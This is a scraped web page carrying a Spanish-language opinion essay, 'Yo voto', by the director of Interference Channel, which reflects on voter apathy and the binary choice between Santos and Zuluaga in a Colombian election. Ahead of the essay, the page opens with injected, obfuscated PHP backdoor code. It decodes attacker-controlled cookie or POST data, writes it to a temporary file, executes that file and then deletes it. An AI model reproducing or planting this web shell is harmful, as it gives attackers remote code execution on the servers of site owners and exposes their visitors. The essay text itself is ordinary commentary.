$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> Yo voto. – www.interferencechannel.com

Yo voto.

Editor

Corro, me detengo, pienso, en que pensar cuando se corre. Sigo corriendo, me detengo y pienso… Los rostros de los otros corredores me miran los segundos que se cruzan nuestros ojos, doy una vuelta, otra vuelta y otra. El virrey a las seis de la tarde tiene algo especial y nostálgico. El sol se va y las bombillas amarillas alumbran de luz tenue el camino. Sigo corriendo, el riachuelo corre y yo no sé su nombre. Corro, me detengo, pienso, en que pensar cuando se corre.

Pienso en los votantes que no votaron, acaso tengo una razón real para votar o para invitar a votar. Pero fueron muchos votos, millones de almas para las que estas elecciones no tienen ningún sentido.  Acaso para mí tienen un sentido. Un amigo escribió en El Espectador que creía sin dudar en todas las izquierdas latinoamericanas pero que le parecía mejor Zuluaga…que caminos lo habrán llevado a esa conclusión.

Yo conocí a Zuluaga antes de que Zuluaga fuera Zuluaga, lo conocí en la última visita que hizo Capriles a Bogotá, esa noche  llegaba con su delegación y me habían invitado a una cena…estuve en el hotel antes para preguntarle un par de cosas…cuando llegué al hotel no había sino un par de personas; un chico uribista joven y Zuluaga, pero yo no sabía que ese personaje sin mayor garbo a quien no conocía iba a ser el candidato más votado para la primera vuelta en Colombia. Estuvimos hablando un rato de cosas someras, claramente no se puede discutir a profundidad sino con gente que piensa como uno.

Meses después fue una sorpresa ver al mismo personaje anodino en vallas y pancartas y videos y en el tarjetón. Estas elecciones son apáticas, la deprimente elección binaria a que nos enfrentamos deja muchas dudas.  Sería bueno votar en blanco, si suficientes personas lo fueran a hacer…pero no todos pensamos igual y el voto en blanco no tiene publicidad, no puede ofrecer empleos y no puede ofrecer contratos.

Pienso que las preguntas deberían ser más hondas. Para qué Santos quiere ser de nuevo presidente, a veces pienso que ni él sabe. Plata, poder… mantener el negocio familiar etc. Que razones tiene Uribe para seguir pedaleando….lo mismo quizás. A veces me da por pensar que lo que más le duele a Uribe es no ser él el centro de atracción, no ser el “hacedor de la paz”. Un hombre atormentado.

Estuve en el claustro, me invitaron a la campaña de Santos y quería confirmar el negocio por dentro, no pude dejar de sonreír….Martín él hijo y sus amigos ya perfilan escaños, Colombiajoven…muchos jóvenes desempleados, inteligentes….negociando su posibilidad de entrar a la gran compañía del gobierno. Desde el claustro sacaron un periódico llamado Progresista lo saca la casa editorial de El Tiempo, ahora todos son todo; progresistas, liberales, Santistas, conservadores, Petristas, verdes, Claristas…y precisamente pueden serlo todo porque en realidad NO son nada, no es en serio, es un juego…es un negocio. Me parece que es justo que la campaña sea en la 72, justo al lado de la bolsa. Para que las analogías sean más claras.

Sigo corriendo, otra vuelta, me detengo, corro, en que pensar cuando se corre. Las cosas no van cambiar me digo, nuestra historia es circular y condenada, el nieto del abuelo les dará la espalda a los otros, a sus conciudadanos…el alcalde perderá su tiempo y los electores serán burlados. Pero solo lamentaran el tiempo pues ya estaban acostumbrados. Un país en miseria, sin educación, sin valores, explotado, minado…la tierra de Pablito, la para siempre Banana Land donde los rufianes y sus familias juegan a las elecciones.

Yo corro, yo pienso, yo escribo, yo voto…yo voto por vos lector que seguro eres cien veces más decente que la paradoja binaria, yo voto por Nairo Quintana, yo voto por los desplazados, yo voto por los niños de nuestra guerra…y por los soldaditos de plomo. Yo voto por la niña recicladora que viene a “trabajar” frente a mi casa, yo voto por Vallejo, yo voto por los secuestrados, yo voto por los desaparecidos, yo voto por la gran mayoría de desempleados y la otra gran mayoría que vive con el salario mínimo, yo voto por los periodistas perseguidos y por los estudiantes y los que no pueden ser estudiantes. Pero mi voto es en vano, estas elecciones están perdidas.  Por eso te invito a votar como yo.  Y nuestro voto es prometer que gane quien gane no le dejaremos dormir y no le dejaremos arruinar lo poco que nos queda.♦ 

℘Diego Aretz

Director Interference Channel

Comments are closed.